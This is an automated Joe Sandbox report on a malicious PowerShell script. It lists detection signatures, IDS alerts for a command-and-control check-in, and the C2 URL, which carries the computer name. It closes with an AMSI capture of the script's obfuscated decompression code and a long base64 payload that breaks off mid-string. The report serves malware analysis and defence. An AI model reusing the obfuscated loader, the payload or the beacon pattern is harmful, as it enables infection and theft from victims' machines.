Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1585341
MD5:6e85589d5b99cc0147e0a2411c974061
SHA1:762c32d847189b201d92f50d641ad751ea90a613
SHA256:de56f2adb28159654d43754aed8f485a3f4808d759103434882f3e9290bfb8dd
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5032, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5032, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-07T14:34:07.935887+010020577411A Network Trojan was detected192.168.2.64971045.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-07T14:34:07.935887+010018100002Potentially Bad Traffic192.168.2.64971045.61.136.13880TCP
2025-01-07T14:34:08.572367+010018100002Potentially Bad Traffic192.168.2.649711142.250.184.22880TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 84.3% probability
Source: Binary string: pdblib.pdbH source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBEBA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V source: powershell.exe, 00000000.00000002.2181821964.000001D9B1A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbogramFi source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb.0? source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBE03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb (x! source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdbg source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb=\\ENGI source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.6:49710 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49711 -> 142.250.184.228:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49710 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jjdgdeffjimfgne.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jjdgdeffjimfgne.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: jjdgdeffjimfgne.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$n57epo4a2v6u0zx/$xme7jrzn1ow6thf.php?id=$env:computername&key=$pagxhc&s=527
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2223453498.000001D9CBBF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftF
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jjdgdeffjimfgne.top
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B61A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6194000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B619D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B3CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B53CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B54B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348D7D460_2_00007FFD348D7D46
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C95F20_2_00007FFD348C95F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348D8AF20_2_00007FFD348D8AF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C94F20_2_00007FFD348C94F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C54EC0_2_00007FFD348C54EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C65FA0_2_00007FFD348C65FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C9EE20_2_00007FFD348C9EE2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C57F20_2_00007FFD348C57F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348D08FA0_2_00007FFD348D08FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C90DD0_2_00007FFD348C90DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C286A0_2_00007FFD348C286A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C58CC0_2_00007FFD348C58CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C730B0_2_00007FFD348C730B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348CEB400_2_00007FFD348CEB40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C83FB0_2_00007FFD348C83FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C74020_2_00007FFD348C7402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34992E920_2_00007FFD34992E92
Source: classification engineClassification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4j11xlv.b0c.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $y3tfeizdwbq6mlr.(([system.String]::new(@((1700-(-7013+8646)),(-9953+10064),(7789-(3303+(19372446/4429))),(2016-(695+(-3541+(-3373+(31604030/(1985+(6715560/3516))))))),(629496/7494),(246-135)))))( $2d64igjrz15vcyt ) $y3tfeizdwbq6mlr.(([system.String]::new(@((125424/(469872/(-7069+7320))),(-9488+9596),(896325/8075),(6653-6538),(684578/6778)))))()$fy9u7kh6ezi8r0b.(([char[]]@((483539/(349+(8483-(6243590/(8119-4253))))),(266760/(16754010/(6164+619))),(-8302+8413),(2419-2304),(9071-8970)) -join ''))()[byte[]] $xbsnruld30okfw7 = $2d64igjrz15vcyt.(([char[]]@((199752/(21742054/9143)),(-9263+(36427364/3886)),(693-628),(4233-(5430-1311)),(-6248+(10308-3946)),(-3436+(-1036+(42135318/(78368556/8498)))),(121484/(6504-(4612+(-8309+(5136+(5746-(-932+2617)))))))) -join ''))() $2o5yj68qiwfzamv=$xbsnruld30okfw7 return $2o5yj68qiwfzamv}[System.Text.Encoding]::ascii.(([system.String]::new(@((4551-(-5540+10020)),(-7193+(36119888/(5049-97))),(513880/(5819-1389)),(-7304+(13675-(8324-2036))),(10264-(11089-941)),(-8711+8825),(9667-9562),(928400/(15558-7118)),(454848/4416)))))((zrmnqphigy0klb76ofdx5w9a182 "drtnbWpscHZldNzpBF8yuhvpTyHhirrwqBb4UFRWi4uk9ql1IOMgIOqKMyd5Mjik/RUkTw/mwlNaipYIv9wSBPD9PN/EZvDJ1cfz0A2j3C8KEveatosAEuTSCQeQjJ2wft8REZuUnZ+S2+ZJUkkck4KEnJu4neLeDieIyn2LJxEO22drFMOLgYGLl9FGIxYqVuqQlrO5imnOigGEm+X0xtmnzyv8KMQMFMwPkrTnTa4eDYOBjcKkwtSWswiOKQ4eBsmXnhdDzUHWwZ9uVuW/lzARhQq+3ocZkiySPwlHtwzM882Ht/qYxKywisAu1e5pdN8zFmXnB0iGFwIGYlGy6n7RB7gOj2kPGZHaALUu/UdEw4j+i76CsLRpLyS7jL/QzDWImYA2y4Gqqu5vguo39DSAztAUaxK6Ij66s70/mp2/M7azsWMmBgTNqPO2rBMri+gBhN9Ut9AbP6zO3YUzVgW33ak/SEKqlM6YtQUQy7EvWKvE2PiBGeUyxZDce0wyByY1CXNBhJ4i+MUrVR/7/YmdqKT7LZDHRvWqWL3I5+TuwrkjKhk0JURwq9wdXhdeaBsErMPpFWkqPNihq7U8hu9h56z82ecOPx4xihfe3uy44BYp1YLjGPUvQM0Ah5GMYWs3NTq6r0ik2ArfkEgRpLo19lh5xLyp3tbowCHALg1TdwmR02YaEAO9N81WevpeHcbI7kfCASHvUjxjs2unHuMACaNIwZWG75VTQpURh5HqvwZOUE3Vk5+dxxHGI8LqH9bLMneRv5iGl5qI/p+w0NRWC4+BGy7ipv7QlIDnX7iuCpktH2zIht4HHj1M0eCOnawKdyaq30YgKxrjBuiiVnw1DVgI3WWOmbp3XG+yrw9MriciFSCswkdXjh/EMYeVv/3q34qWBZpEof8qEr+EfUERLFiYurfuintJN8kjeT3ZPrmddqlGS/V67Mp++KfeAgVFZzZzh4GCN+SA/p14AhFPfkWvm23U99OiDJmh693FrCBFp6/5gchVI5zZb17XQsIJkXSjEHeqapZ8wCDmBmD0fl2Eyn3LVMhvdqdULoIYtXyoZfv3z7yEk4aKj44rlsCDh56Fjp6LhrSsmH+Ygpe/P0EQHc7rFIdUFxiekoO4u8Lq527yEZmamZ+THM6SBcCl6UEcDtcNKMloxpA+wl+71qbO8YEQ0nRBtuBCpNP12EEL0UsTFByejJePk46qJlvWGFFuZE1zhVDz8U1He9bhs1ApNhWpX9DdUBlYSVEDTxTQv1HiAMUUY5jVUZod1aAfVdZwx3CDmifnRBAf864